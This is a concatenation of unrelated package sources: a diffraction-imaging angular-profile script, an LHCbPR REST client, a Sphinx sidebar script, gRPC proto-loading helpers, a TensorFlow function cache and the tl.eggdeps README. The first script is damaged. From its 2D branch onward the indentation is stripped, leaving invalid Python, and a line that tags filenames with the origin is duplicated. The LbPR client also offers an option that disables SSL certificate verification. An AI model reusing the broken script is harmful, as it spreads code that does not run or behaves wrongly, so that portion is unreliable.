# modulus threshold defining the normalized object from the background
angular_step = 1  # in degrees, the linecut directions will be automatically calculated
# in the orthonormal reference frame is given by the array axes.
# It will be corrected for anisotropic voxel sizes.
roi = None  # (470, 550, 710, 790) # P2_001a.tif
# (470, 550, 710, 790) # P2_001a.tif
# (220, 680, 620, 1120) # P2_018.tif
# ROI centered around the crystal of interest in the 2D image
# the center of mass will be determined within this ROI when origin is not defined.
# Leave None to use the full array.
origin = None  # origin where all the line cuts pass by
# (indices considering the array cropped to roi).
# If None, it will use the center of mass of the modulus in the region defined by roi
voxel_size = 5
# 2.070393374741201 * 0.96829786 # P2_001a.tif
# 0.3448275862068966 * 0.96829786 # P2_018.tif
# positive real number or tuple of 2 or 3 positive real number
# (2 for 2D object, 3 for 3D) (in nm)
sum_axis = 1  # if the object is 3D, it will be summed along that axis
debug = False  # True to print the output dictionary and plot the legend
tick_length = 8  # in plots
tick_width = 2  # in plots
comment = ""  # string to add to the filename when saving
##################################
# end of user-defined parameters #
##################################
#############################
# define default parameters #
#############################
colors = ("b", "g", "r", "c", "m", "y", "k")  # for plots
markers = (".", "v", "^", "<", ">")  # for plots
# label used to tag the error messages raised by the validation helpers below
validation_name = "angular_profile"
mpl.rcParams["axes.linewidth"] = tick_width  # set the linewidth globally
#########################
# check some parameters #
#########################
# upsampling_factor must be a strictly positive integer
valid.valid_item(
    value=upsampling_factor, allowed_types=int, min_included=1, name=validation_name
)
valid.valid_container(comment, container_types=str, name=validation_name)
# drop a leading underscore; it is added back in a controlled way further down
if comment.startswith("_"):
    comment = comment[1:]
##################################################
# create the list of directions for the linecuts #
##################################################
# Directions are (sin, cos) unit vectors sampling the half-circle [0, 180) deg;
# angles in [180, 360) would duplicate the same linecuts through the origin.
angles = np.arange(0, 180, angular_step)
nb_dir = len(angles)  # kept: reused below to size the width array
# build the (sin, cos) pairs in one pass; np.deg2rad replaces the manual
# "* np.pi / 180" conversion used previously
directions = [
    (np.sin(np.deg2rad(angle)), np.cos(np.deg2rad(angle))) for angle in angles
]
#################
# load the data #
#################
plt.ion()  # interactive plotting: figures do not block the script
# hide the tkinter root window, only the file dialog will be shown
root = tk.Tk()
root.withdraw()
file_path = filedialog.askopenfilename(
    initialdir=datadir,
    filetypes=[
        ("NPZ", "*.npz"),
        ("NPY", "*.npy"),
        ("CXI", "*.cxi"),
        ("HDF5", "*.h5"),
        ("all files", "*.*"),
    ],
)
_, ext = os.path.splitext(file_path)
if ext in {".png", ".jpg", ".tif"}:
    # 2D image file (e.g. SEM picture), loaded as a grayscale array
    # NOTE(review): these extensions are only reachable through the
    # "all files" filter of the dialog above -- confirm this is intended
    obj = util.image_to_ndarray(filename=file_path, convert_grey=True)
else:
    # reconstructed object (npz/npy/cxi/h5): keep only the modulus
    obj, _ = util.load_file(file_path)
    obj = abs(obj)
ndim = obj.ndim
if isinstance(voxel_size, Real):
    # isotropic voxels: broadcast the scalar to one value per dimension
    voxel_size = (voxel_size,) * ndim
print(f"Object shape = {obj.shape}, voxel size = {voxel_size}")
if upsampling_factor > 1:
    # interpolate the object on a finer grid (voxel size divided by the factor)
    obj, voxel_size = fu.upsample(
        array=obj,
        upsampling_factor=upsampling_factor,
        voxelsizes=voxel_size,
        title="modulus",
        debugging=debug,
    )
    print(f"Upsampled object shape = {obj.shape}, upsampled voxel size = {voxel_size}")
else:
    # no upsampling: simply validate the user-provided voxel sizes
    valid.valid_container(
        voxel_size,
        container_types=(list, tuple, np.ndarray),
        length=ndim,
        item_types=Real,
        min_excluded=0,
        name="angular_profile",
    )
#########################
# check some parameters #
#########################
if ndim == 3:
    nbz, nby, nbx = obj.shape
elif ndim == 2:
    nby, nbx = obj.shape
else:
    raise ValueError(f"obj should be either 2D or 3D, ndim={ndim}")
if roi is None:
    # default: use the full (y, x) extent of the array
    roi = (0, nby, 0, nbx)
valid.valid_container(
    roi,
    container_types=(list, tuple, np.ndarray),
    length=4,
    item_types=int,
    min_included=0,
    name="angular_profile",
)
if not (roi[0] < roi[1] <= nby and roi[2] < roi[3] <= nbx):
    raise ValueError("roi incompatible with the array shape")
# crop the array to the region of interest
# NOTE(review): for a 3D object this slices the first two axes (z, y) with
# bounds computed against (nby, nbx) -- confirm the intended behavior in 3D
obj = obj[roi[0] : roi[1], roi[2] : roi[3]].astype(float)
if origin is None:
    # default origin: center of mass of the modulus (projected first if 3D)
    if ndim == 3:
        piy, pix = center_of_mass(obj.sum(axis=sum_axis))
    else:
        piy, pix = center_of_mass(obj)
    origin = int(np.rint(piy)), int(np.rint(pix))
valid.valid_container(
    origin,
    container_types=(list, tuple),
    length=2,
    item_types=int,
    name="angular_profile",
)
savedir = savedir or datadir
# create the output directory if it does not exist yet
pathlib.Path(savedir).mkdir(parents=True, exist_ok=True)
if isinstance(threshold, Real):
    # allow a single number: normalize it to a 1-element tuple
    threshold = (threshold,)
valid.valid_container(
    threshold,
    container_types=(list, tuple, np.ndarray),
    item_types=Real,
    min_included=0,
    max_included=1,
    name="angular_profile",
)
# the origin is encoded in the filenames of the saved figures
comment = f"_origin_{origin}_{comment}"
comment = f"_origin_{origin}_{comment}"
#########################
# normalize the modulus #
#########################
obj = abs(obj) / abs(obj).max() # normalize the modulus to 1
obj[np.isnan(obj)] = 0 # remove nans
fig, axs, _ = gu.imshow_plot(
array=obj,
sum_frames=True,
sum_axis=1,
plot_colorbar=True,
reciprocal_space=False,
vmin=0,
vmax=np.nan,
is_orthogonal=True,
)
gu.savefig(
savedir=savedir,
figure=fig,
axes=axs,
tick_width=tick_width,
tick_length=tick_length,
tick_labelsize=14,
xlabels=axs.get_xlabel(),
ylabels=axs.get_ylabel(),
titles=axs.get_title(),
label_size=16,
filename=f"roi{roi}" + comment,
)
comment = comment + f"_{angular_step}deg"
result = {}
#########################################################
# 3D case (BCDI): loop over thresholds first            #
# (the threshold needs to be applied before projecting) #
#########################################################
if ndim == 3:
    # remove the voxel size along the projection axis: after summing over
    # sum_axis the object is 2D, so the linecuts need only two voxel sizes
    voxel_size = list(voxel_size)
    voxel_size.pop(sum_axis)
    valid.valid_container(
        voxel_size,
        container_types=list,
        length=2,
        item_types=Real,
        min_excluded=0,
        name="angular_profile",
    )
    # width of the object as a function of (threshold, direction)
    ang_width = np.empty((len(threshold), nb_dir))
    for idx, thres in enumerate(threshold):
        # apply the threshold on a copy so that obj stays untouched
        tmp_obj = np.copy(obj)
        tmp_obj[tmp_obj < thres] = 0
        if ndim == 3:  # project the object
            # NOTE(review): this guard is always True inside this branch;
            # it looks like a leftover and could be removed -- confirm
            tmp_obj = tmp_obj.sum(axis=sum_axis)
        # NOTE(review): if thres is above the maximum of the object, tmp_obj
        # is all zeros and this division produces NaNs -- confirm thresholds
        # are always below the normalized maximum
        tmp_obj = abs(tmp_obj) / abs(tmp_obj).max()  # normalize the modulus to 1
        for idy, direction in enumerate(directions):
            # get the distances and the modulus values along the linecut
            distance, cut = util.linecut(
                array=tmp_obj, point=origin, direction=direction, voxel_size=voxel_size
            )
            # get the indices where the linecut is non_zero
            indices = np.nonzero(cut)
            # get the width along the cut for that threshold
            # (distance between the first and the last non-zero points)
            ang_width[idx, idy] = distance[max(indices[0])] - distance[min(indices[0])]
    # store the result in the dictionary
    result["ang_width_threshold"] = ang_width
else:
##############################################################################
# calculate the evolution of the width vs threshold for different directions #
##############################################################################
for idx, direction in enumerate(directions):
# get the distances and the modulus values along the linecut
distance, cut = util.linecut(
array=obj, point=origin, direction=direction, voxel_size=voxel_size
)
fit = interp1d(distance, cut)
dist_interp = np.linspace(distance.min(), distance.max(), num=10000)
cut_interp = fit(dist_interp)
width = np.empty(len(threshold))
# calculate the function width vs threshold
for idy, thres in enumerate(threshold):
# calculate the distances where the modulus is equal to threshold
crossings = np.argwhere(cut_interp > thres)
if len(crossings) > 1:
width[idy] = dist_interp[crossings.max()] - dist_interp[crossings.min()]
else:
width[idy] = 0
# store the result in a dictionary
# (cuts can have different lengths depending on the direction)
result[f"direction ({direction[0]:.4f},{direction[1]:.4f})"] = {
"angle": angles[idx],
"distance": distance,
"cut": cut,
"threshold": threshold,
"width": width,
}
if debug: # plot all line cuts
fig = plt.figure(figsize=(12, 9))
ax = plt.subplot(111)
plot_nb = 0
for key, value in result.items():
# value is a dictionary
# {'angle': angles[idx], 'distance': distance, 'cut': cut}
(line,) = ax.plot(
value["distance"],
value["cut"],
color=colors[plot_nb % len(colors)],
marker=markers[(plot_nb // len(colors)) % len(markers)],
fillstyle="none",
markersize=6,
linestyle="-",
linewidth=1,
)
line.set_label(f"{key}")
plot_nb += 1
legend = False
if plot_nb < 15:
legend = True
gu.savefig(
savedir=savedir,
figure=fig,
axes=ax,
tick_width=tick_width,
tick_length=tick_length,
tick_labelsize=16,
xlabels="width (nm)",
ylabels="modulus",
label_size=20,
legend=legend,
legend_labelsize=14,
filename="cuts" + comment,
only_labels=True,
)
##########################################################################
# calculate the evolution of the width vs angle for different thresholds #
##########################################################################
ang_width_threshold = np.empty((len(threshold), nb_dir))
for idx, thres in enumerate(threshold):
tmp_angles = np.empty(nb_dir) # will be used to reorder the angles
angular_width = np.empty(nb_dir)
count = 0
for key, value in result.items(): # iterating over the directions
# value is a dictionary
# {'angle': angles[idx], 'distance': distance, 'cut': cut}
tmp_angles[count] = value["angle"] # index related to the angle/direction
if thres != value["threshold"][idx]:
raise ValueError("ordering error in threshold")
angular_width[count] = value["width"][idx] # index related to the threshold
count += 1
if not np.all(np.isclose(tmp_angles, angles)):
raise ValueError("ordering error in angles")
ang_width_threshold[idx, :] = angular_width
# update the dictionary
result["ang_width_threshold"] = ang_width_threshold
#####################################################
# plot the width vs angle for different thresholds #
#####################################################
fig = plt.figure(figsize=(12, 9))
ax = plt.subplot(111)
for idx, thres in enumerate(threshold):
(line,) = ax.plot(
angles,
result["ang_width_threshold"][idx],
color=colors[idx % len(colors)],
marker=markers[(idx // len(colors)) % len(markers)],
fillstyle="none",
markersize=6,
linestyle="-",
linewidth=1,
)
line.set_label(f"threshold {thres}")
legend = False
if len(threshold) < 15:
legend = True
gu.savefig(
savedir=savedir,
figure=fig,
axes=ax,
tick_width=tick_width,
tick_length=tick_length,
tick_labelsize=14,
xlabels="angle (deg)",
ylabels="width (nm)",
label_size=20,
legend=legend,
legend_labelsize=14,
filename="width_vs_ang" + comment,
only_labels=True,
)
###################
# save the result #
###################
result["threshold"] = threshold
result["angles"] = angles
result["origin"] = origin
result["roi"] = roi
if debug:
print("output dictionary:\n", json.dumps(result, cls=fmt.CustomEncoder, indent=4))
with open(savedir + "ang_width" + comment + ".json", "w", encoding="utf-8") as file:
json.dump(result, file, cls=fmt.CustomEncoder, ensure_ascii=False, indent=4)
plt.ioff()
plt.show()
|
PypiClean
|
/LbNightlyTools-4.0.1-py3-none-any.whl/LbPR/LbPRJobManager.py
|
from future import standard_library
standard_library.install_aliases()
import json
import ssl
import sys
import urllib.error
import urllib.parse
import urllib.request
from builtins import object
# HTTP headers sent with LHCbPR REST requests: form-encoded request body,
# plain-text response expected.
HEADERS = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
# Module-level SSL-verification default. NOTE(review): not referenced by the
# code visible here (JobManager takes check_ssl per instance) — confirm
# whether external callers import this constant before removing it.
CHECK_SSL = False
def urlopen(url, check_ssl=True):
    """
    Wrapper for urllib.request.urlopen to enable or disable SSL verification.

    :param url: URL string (or Request object) to open.
    :param check_ssl: when False, skip SSL certificate validation
        (certificates are validated by default since Python 2.7.9).
    :return: the file-like response object from urllib.request.urlopen.
    """
    if not check_ssl and sys.version_info >= (2, 7, 9):
        # With Python >= 2.7.9 SSL certificates are validated by default,
        # but an unverified context lets us ignore them.
        # (Fixed: removed an unused `from ssl import PROTOCOL_SSLv23,
        # SSLContext` — neither name was ever used.)
        return urllib.request.urlopen(url, context=ssl._create_unverified_context())
    return urllib.request.urlopen(url)
class JobManager(object):
    """
    Interface to the LHCbPR system.
    """

    def __init__(self, lhcbpr_api_url, check_ssl=True):
        """
        Constructor taking the URL for the LHCbPR server.
        """
        self._lhcbpr_api_url = lhcbpr_api_url
        self._check_ssl = check_ssl

    def _first_result(self, url):
        # Fetch the JSON document at `url` and return the first entry of its
        # "results" list, or None when the query matched nothing.
        payload = json.loads(urlopen(url, self._check_ssl).read())
        return payload["results"][0] if payload["count"] else None

    def getJobOptions(self, options_description):
        """Get the list of options from LHCbPR2"""
        return self._first_result(
            "%s/options/?description=%s" % (self._lhcbpr_api_url, options_description)
        )

    def getExecutableOptions(self, executable):
        """Get the list of options from LHCbPR2"""
        return self._first_result(
            "%s/executables/?name=%s" % (self._lhcbpr_api_url, executable)
        )

    def getSetupOptions(self, setup_description):
        """Get the SetupProject options from LHCbPR2"""
        if not setup_description:
            return None
        return self._first_result(
            "%s/setups/?description=%s" % (self._lhcbpr_api_url, setup_description)
        )
|
PypiClean
|
/py_knife-0.01.28.tar.gz/py_knife-0.01.28/docs/_static/sidebar.js
|
$(function() {
  // global elements used by the functions.
  // the 'sidebarbutton' element is defined as global after its
  // creation, in the add_sidebar_button function
  var bodywrapper = $('.bodywrapper');
  var sidebar = $('.sphinxsidebar');
  var sidebarwrapper = $('.sphinxsidebarwrapper');

  // for some reason, the document has no sidebar; do not run into errors
  if (!sidebar.length) return;

  // original margin-left of the bodywrapper and width of the sidebar
  // with the sidebar expanded
  var bw_margin_expanded = bodywrapper.css('margin-left');
  var ssb_width_expanded = sidebar.width();

  // margin-left of the bodywrapper and width of the sidebar
  // with the sidebar collapsed
  var bw_margin_collapsed = '.8em';
  var ssb_width_collapsed = '.8em';

  // colors used by the current theme
  var dark_color = $('.related').css('background-color');
  var light_color = $('.document').css('background-color');

  // Whether the sidebar content is currently hidden (collapsed state).
  function sidebar_is_collapsed() {
    return sidebarwrapper.is(':not(:visible)');
  }

  // Flip between the collapsed and expanded states.
  function toggle_sidebar() {
    if (sidebar_is_collapsed())
      expand_sidebar();
    else
      collapse_sidebar();
  }

  // Hide the sidebar content, shrink the sidebar to a thin strip, and
  // persist the state in the 'sidebar' cookie.
  function collapse_sidebar() {
    sidebarwrapper.hide();
    sidebar.css('width', ssb_width_collapsed);
    bodywrapper.css('margin-left', bw_margin_collapsed);
    sidebarbutton.css({
        'margin-left': '0',
        'height': bodywrapper.height()
    });
    sidebarbutton.find('span').text('»');
    sidebarbutton.attr('title', _('Expand sidebar'));
    document.cookie = 'sidebar=collapsed';
  }

  // Restore the sidebar to its original width and persist the state.
  function expand_sidebar() {
    bodywrapper.css('margin-left', bw_margin_expanded);
    sidebar.css('width', ssb_width_expanded);
    sidebarwrapper.show();
    sidebarbutton.css({
        'margin-left': ssb_width_expanded-12,
        'height': bodywrapper.height()
    });
    sidebarbutton.find('span').text('«');
    sidebarbutton.attr('title', _('Collapse sidebar'));
    document.cookie = 'sidebar=expanded';
  }

  // Create the clickable collapse/expand handle next to the sidebar and
  // wire up its styling, centering and hover behaviour.
  function add_sidebar_button() {
    sidebarwrapper.css({
        'float': 'left',
        'margin-right': '0',
        'width': ssb_width_expanded - 28
    });
    // create the button
    sidebar.append(
        '<div id="sidebarbutton"><span>«</span></div>'
    );
    // NOTE: this local declaration shadows the module-level
    // 'sidebarbutton' assigned after add_sidebar_button() returns.
    var sidebarbutton = $('#sidebarbutton');
    light_color = sidebarbutton.css('background-color');

    // find the height of the viewport to center the '<<' in the page
    var viewport_height;
    if (window.innerHeight)
      viewport_height = window.innerHeight;
    else
      viewport_height = $(window).height();
    sidebarbutton.find('span').css({
        'display': 'block',
        'margin-top': (viewport_height - sidebar.position().top - 20) / 2
    });

    sidebarbutton.click(toggle_sidebar);
    sidebarbutton.attr('title', _('Collapse sidebar'));
    sidebarbutton.css({
        'color': '#FFFFFF',
        'border-left': '1px solid ' + dark_color,
        'font-size': '1.2em',
        'cursor': 'pointer',
        'height': bodywrapper.height(),
        'padding-top': '1px',
        'margin-left': ssb_width_expanded - 12
    });

    sidebarbutton.hover(
      function () {
          $(this).css('background-color', dark_color);
      },
      function () {
          $(this).css('background-color', light_color);
      }
    );
  }

  // Re-apply the collapsed/expanded state saved in the 'sidebar' cookie.
  function set_position_from_cookie() {
    if (!document.cookie)
      return;
    var items = document.cookie.split(';');
    for(var k=0; k<items.length; k++) {
      var key_val = items[k].split('=');
      var key = key_val[0].replace(/ /, ""); // strip leading spaces
      if (key == 'sidebar') {
        var value = key_val[1];
        if ((value == 'collapsed') && (!sidebar_is_collapsed()))
          collapse_sidebar();
        else if ((value == 'expanded') && (sidebar_is_collapsed()))
          expand_sidebar();
      }
    }
  }

  add_sidebar_button();
  var sidebarbutton = $('#sidebarbutton');
  set_position_from_cookie();
});
|
PypiClean
|
/mis_modulos-0.1.tar.gz/mis_modulos-0.1/grpc/_runtime_protos.py
|
import sys
import types
from typing import Tuple, Union
_REQUIRED_SYMBOLS = ("_protos", "_services", "_protos_and_services")
_MINIMUM_VERSION = (3, 5, 0)
_UNINSTALLED_TEMPLATE = "Install the grpcio-tools package (1.32.0+) to use the {} function."
_VERSION_ERROR_TEMPLATE = "The {} function is only on available on Python 3.X interpreters."
def _has_runtime_proto_symbols(mod: types.ModuleType) -> bool:
return all(hasattr(mod, sym) for sym in _REQUIRED_SYMBOLS)
def _is_grpc_tools_importable() -> bool:
try:
import grpc_tools # pylint: disable=unused-import # pytype: disable=import-error
return True
except ImportError as e:
# NOTE: It's possible that we're encountering a transitive ImportError, so
# we check for that and re-raise if so.
if "grpc_tools" not in e.args[0]:
raise
return False
def _call_with_lazy_import(
    fn_name: str, protobuf_path: str
) -> Union[types.ModuleType, Tuple[types.ModuleType, types.ModuleType]]:
    """Calls one of the three functions, lazily importing grpc_tools.

    Args:
      fn_name: The name of the function to import from grpc_tools.protoc.
      protobuf_path: The path to import.

    Returns:
      The appropriate module object.
    """
    # Guard clauses: unsupported interpreter, then missing grpcio-tools.
    if sys.version_info < _MINIMUM_VERSION:
        raise NotImplementedError(_VERSION_ERROR_TEMPLATE.format(fn_name))
    if not _is_grpc_tools_importable():
        raise NotImplementedError(_UNINSTALLED_TEMPLATE.format(fn_name))
    import grpc_tools.protoc  # pytype: disable=import-error
    # An installed grpc_tools may still be too old to carry the runtime
    # proto-loading symbols.
    if not _has_runtime_proto_symbols(grpc_tools.protoc):
        raise NotImplementedError(_UNINSTALLED_TEMPLATE.format(fn_name))
    target = getattr(grpc_tools.protoc, '_' + fn_name)
    return target(protobuf_path)
def protos(protobuf_path):  # pylint: disable=unused-argument
    """Returns a module generated by the indicated .proto file.

    THIS IS AN EXPERIMENTAL API.

    Use this function to retrieve classes corresponding to message
    definitions in the .proto file. The returned module object corresponds
    to the _pb2.py file generated by protoc; inspect its contents with the
    dir function. For example:

    ```
    protos = grpc.protos("foo.proto")
    print(dir(protos))
    ```

    The path is expected to be relative to an entry on sys.path, and all
    transitive dependencies of the file must be resolveable from an entry
    on sys.path as well.

    To completely disable the machinery behind this function, set the
    GRPC_PYTHON_DISABLE_DYNAMIC_STUBS environment variable to "true".

    Args:
      protobuf_path: Filesystem path of the .proto file, resolveable from
        an entry on sys.path along with all of its transitive dependencies.

    Returns:
      A module object corresponding to the message code for the indicated
      .proto file. Equivalent to a generated _pb2.py file.
    """
    return _call_with_lazy_import("protos", protobuf_path)
def services(protobuf_path):  # pylint: disable=unused-argument
    """Returns a module generated by the indicated .proto file.

    THIS IS AN EXPERIMENTAL API.

    Use this function to retrieve classes and functions corresponding to
    service definitions in the .proto file, including both stub and
    servicer definitions. The returned module object corresponds to the
    _pb2_grpc.py file generated by protoc; inspect its contents with the
    dir function. For example:

    ```
    services = grpc.services("foo.proto")
    print(dir(services))
    ```

    The path is expected to be relative to an entry on sys.path, and all
    transitive dependencies of the file must be resolveable from an entry
    on sys.path as well.

    To completely disable the machinery behind this function, set the
    GRPC_PYTHON_DISABLE_DYNAMIC_STUBS environment variable to "true".

    Args:
      protobuf_path: Filesystem path of the .proto file, resolveable from
        an entry on sys.path along with all of its transitive dependencies.

    Returns:
      A module object corresponding to the stub/service code for the
      indicated .proto file. Equivalent to a generated _pb2_grpc.py file.
    """
    return _call_with_lazy_import("services", protobuf_path)
def protos_and_services(protobuf_path):  # pylint: disable=unused-argument
    """Returns a 2-tuple of modules corresponding to protos and services.

    THIS IS AN EXPERIMENTAL API.

    Calling this function is equivalent to a call to protos and a call to
    services on the same path.

    To completely disable the machinery behind this function, set the
    GRPC_PYTHON_DISABLE_DYNAMIC_STUBS environment variable to "true".

    Args:
      protobuf_path: Filesystem path of the .proto file, resolveable from
        an entry on sys.path along with all of its transitive dependencies.

    Returns:
      A 2-tuple of module objects corresponding to
      (protos(path), services(path)).
    """
    return _call_with_lazy_import("protos_and_services", protobuf_path)
|
PypiClean
|
/tensorflow_rocm-2.12.0.560-cp310-cp310-manylinux2014_x86_64.whl/tensorflow/core/function/polymorphism/function_cache.py
|
"""Cache to manage concrete functions and their signatures."""
import collections
from typing import Any, NamedTuple, Optional
from tensorflow.core.function import trace_type
from tensorflow.core.function.polymorphism import function_type as function_type_lib
from tensorflow.core.function.polymorphism import type_dispatch
# TODO(b/182990542): Enable and remove flag when stable.
# When True, FunctionCache.add registers a deletion listener that evicts the
# cache entry once its weakrefs die; when False the listener is a no-op and
# entries live for the cache's lifetime.
DELETE_WITH_WEAKREF = False
class FunctionContext(NamedTuple):
  """Contains information regarding tf.function execution context."""
  # Opaque context payload; via NamedTuple equality/hashing it forms part of
  # the (context, function_type) cache key used by FunctionCache.
  context: Any
class FunctionCache:
  """A container for managing concrete functions."""

  __slots__ = ["_primary", "_dispatch_dict", "_garbage_collectors"]

  def __init__(self):
    # Maps (FunctionContext, FunctionType) to a concrete function.
    self._primary = collections.OrderedDict()
    # Maps FunctionContext to a TypeDispatchTable holding the FunctionTypes
    # registered for that particular context.
    self._dispatch_dict = {}

  def lookup(self, context: FunctionContext,
             function_type: function_type_lib.FunctionType) -> Optional[Any]:
    """Looks up a concrete function based on the context and type."""
    table = self._dispatch_dict.get(context)
    if table is None:
      return None
    target_type = table.dispatch(function_type)
    if not target_type:
      return None
    return self._primary[(context, target_type)]

  def delete(self, context: FunctionContext,
             function_type: function_type_lib.FunctionType) -> bool:
    """Deletes a concrete function given the context and type."""
    key = (context, function_type)
    if key not in self._primary:
      return False
    del self._primary[key]
    self._dispatch_dict[context].delete(function_type)
    return True

  def add(self, context: FunctionContext,
          function_type: function_type_lib.FunctionType,
          deletion_observer: trace_type.WeakrefDeletionObserver,
          concrete_fn: Any):
    """Adds a new concrete function alongside its key.

    Args:
      context: A FunctionContext representing the current context.
      function_type: A FunctionType representing concrete_fn signature.
      deletion_observer: A WeakrefDeletionObserver for the concrete_fn
        validity.
      concrete_fn: The concrete function to be added to the cache.
    """
    self._primary[(context, function_type)] = concrete_fn
    if context not in self._dispatch_dict:
      self._dispatch_dict[context] = type_dispatch.TypeDispatchTable()
    self._dispatch_dict[context].add_target(function_type)
    # Only evict via weakref death when the flag is enabled; otherwise
    # register a no-op listener.
    if DELETE_WITH_WEAKREF:
      listener_fn = lambda: self.delete(context, function_type)
    else:
      listener_fn = lambda: None
    deletion_observer.add_listener(listener_fn)

  def generalize(
      self, context: FunctionContext,
      function_type: function_type_lib.FunctionType
  ) -> function_type_lib.FunctionType:
    """Try to generalize a FunctionType within a FunctionContext."""
    table = self._dispatch_dict.get(context)
    if table is None:
      # Unknown context: nothing to generalize against.
      return function_type
    return table.try_generalizing_function_type(function_type)

  # TODO(b/205971333): Remove this function.
  def clear(self):
    """Removes all concrete functions from the cache."""
    self._primary.clear()
    self._dispatch_dict.clear()

  def values(self):
    """Returns a list of all `ConcreteFunction` instances held by this cache."""
    return list(self._primary.values())
|
PypiClean
|
/tl.eggdeps-1.0.tar.gz/tl.eggdeps-1.0/README.rst
|
==========
tl.eggdeps
==========
The ``eggdeps`` tool reports dependencies between eggs in the working set.
Dependencies are considered recursively, creating a directed graph. This graph
is printed to standard output either as plain text, or as an input file to the
graphviz tools.
Usage
=====
``eggdeps [options] [specifications]``
Specifications must follow the usual syntax for specifying distributions of
Python packages as defined by ``pkg_resources``.
- If any specifications are given, the corresponding distributions will make
up the roots of the dependency graph, and the graph will be restricted to
their dependencies.
- If no specifications are given, the graph will map the possible dependencies
between all eggs in the working set and its roots will be those
distributions that aren't dependencies of any other distributions.
Options
-------
-h, --help show this help message and exit
-i IGNORE, --ignore=IGNORE
project names to ignore
-I RE_IGNORE, --re-ignore=RE_IGNORE
regular expression for project names to ignore
-e DEAD_ENDS, --dead-end=DEAD_ENDS
names of projects whose dependencies to ignore
-E RE_DEAD_ENDS, --re-dead-end=RE_DEAD_ENDS
regular expression for project names whose
dependencies to ignore
-x, --no-extras always omit extra dependencies
-n, --version-numbers print version numbers of active distributions
-1, --once in plain text output, include each distribution only
once
-t, --terse in plain text output, omit any hints at unprinted
distributions, such as ellipses
-d, --dot produce a dot graph
-c, --cluster in a dot graph, cluster direct dependencies of each
root distribution
-r, --requirements produce a requirements list
-s, --version-specs in a requirements list, print loosest possible version
specifications
The ``-i``, ``-I``, ``-e``, and ``-E`` options may occur multiple times.
If both the ``-d`` and ``-r`` options are given, the one listed last wins.
When printing requirements lists, ``-v`` wins over ``-s``.
The script entry point recognizes default values for all options, the variable
names being the long option names with any dashes replaced by underscores
(except for ``--no-extras``, which translates to setting ``extras=False``).
This allows for setting defaults using the ``arguments`` option of the egg
recipe in a buildout configuration, for example.
Details
=======
The goal of ``eggdeps`` is to compute a directed dependency graph with nodes
that represent egg distributions from the working set, and edges which
represent either mandatory or extra dependencies between the eggs.
Working set
-----------
The working set ``eggdeps`` operates on is defined by the egg distributions
available to the running Python interpreter. For example, these may be the
distributions activated by ``easy_install`` or installed in a ``zc.buildout``
environment.
If the graph is to be calculated to such specifications that not all required
distributions are in the working set, the missing ones will be marked in the
output, and their dependencies cannot be determined. The same happens if any
distribution that is either specified on the command line or required by any
other distribution is available in the working set, but at a version
incompatible with the specified requirement.
Graph building strategies
-------------------------
The dependency graph may be built following either of two strategies:
:Analysing the whole working set:
Nodes correspond exactly to the distributions in the working set. Edges
corresponding to all conceivable dependencies between any active
distributions are included, but only if the required distribution is active
at the correct version. The roots of the graph correspond to those
distributions no other active distributions depend upon.
:Starting from one or more eggs:
Nodes include all packages depended upon by the specified distributions and
extras, as well as their deep dependencies. They may cover only part of the
working set, as well as include nodes for distributions that are not active
at the required versions or not active at all (so their dependencies can not
be followed). The roots of the graph correspond to the specified
distributions.
Some information will be lost while building the graph:
- If a dependency occurs both mandatorily and by way of one or more extras, it
will be recorded as a plain mandatory dependency.
- If a distribution A with installed extras is a dependency of multiple other
distributions, they will all appear to depend on A with all its required
extras, even if they individually require none or only a few of them.
Reducing the graph
------------------
In order to reduce an otherwise big and tangled dependency graph, certain
nodes and edges may be omitted.
:Ignored nodes:
Nodes may be ignored completely by exact name or regular expression
  matching. This is useful if a very basic distribution is a dependency of a
lot of others. An example might be ``setuptools``.
:Dead ends:
Distributions may be declared dead ends by exact name or regular expression
matching. Dead ends are included in the graph but their own dependencies
will be ignored. This allows for large subsystems of distributions to be
blotted out except for their "entry points". As an example, one might
declare ``zope.app.*`` dead ends in the context of ``zope.*`` packages.
:No extras:
Reporting and following extra dependencies may be switched off completely.
This will probably make most sense when analysing the working set rather
than the dependencies of specified distributions.
Output
------
There are two ways ``eggdeps`` can output the computed dependency graph: plain
text (the default) and a dot file to be fed to the graphviz tools.
Plain text output
~~~~~~~~~~~~~~~~~
The graph is printed to standard output essentially one node per line,
indented according to nesting depth, and annotated where appropriate. The
dependencies of each node are sorted after the following criteria:
- Mandatory dependencies are printed before extra requirements.
- Dependencies of each set of extras are grouped, the groups being sorted
alphabetically by the names of the extras.
- Dependencies which are either all mandatory or by way of the same set of
extras are sorted alphabetically by name.
As an illustrating example, the following dependency graph was computed for
two Zope packages, one of them required with a "test" extra depending on an
uninstalled egg, and some graph reduction applied::
zope.annotation
zope.app.container *
zope.component
zope.deferredimport
zope.proxy
zope.deprecation
zope.event
zope.dublincore
zope.annotation ...
[test]
(zope.app.testing) *
:Brackets []:
If one or more dependencies of a node are due to extra requirements only,
the names of those extras are printed in square brackets above their
dependencies, half-indented relative to the node which requires them.
:Ellipsis ...:
If a node with further dependencies occurs at several places in the graph,
  the subgraph is printed only once, the other occurrences being marked by an
ellipsis. The place where the subgraph is printed is chosen such that
* extra dependencies occur as late as possible in the path, if at all,
* shallow nesting is preferred,
* paths early in the alphabet are preferred.
:Parentheses ():
If a distribution is not in the working set, its name is parenthesised.
:Asterisk *:
Dead ends are marked by an asterisk.
Dot file output
~~~~~~~~~~~~~~~
In a dot graphics, nodes and edges are not annotated with text but colored.
These are the color codes for nodes, later ones overriding earlier ones in
cases where more than one color is appropriate:
:Green:
Nodes corresponding to the roots of the graph.
:Yellow:
Direct dependencies of any root nodes, whether mandatory or through extras.
:Lightgrey:
Dead ends.
:Red:
Nodes for eggs installed at a version incompatible with some requirement, or
not installed at all.
Edge colors:
:Black:
Mandatory dependencies.
:Lightgrey:
Extra dependencies.
Other than being highlighted by color, root nodes and their direct
dependencies may be clustered. ``eggdeps`` tries to put each root node in its
own cluster. However, if two or more root nodes share any direct dependencies,
they will share a cluster as well.
Requirements list
~~~~~~~~~~~~~~~~~
All the distributions included in the graph may be output as the Python
representation of a list of requirement specifications, either
- listing bare package names,
- including the exact versions as they occur in the working set, or
- specifying complex version requirements that take into account all version
requirements made for the distribution in question (but disregard extras
completely for the time being). Complex version requirements always require
at least the version that occurs in the working set, assuming that we cannot
know the version requirements of past versions but reasonably assume that
requirements might stay the same for future versions.
The list is sorted alphabetically by distribution name.
.. Local Variables:
.. mode: rst
.. End:
|
PypiClean
|
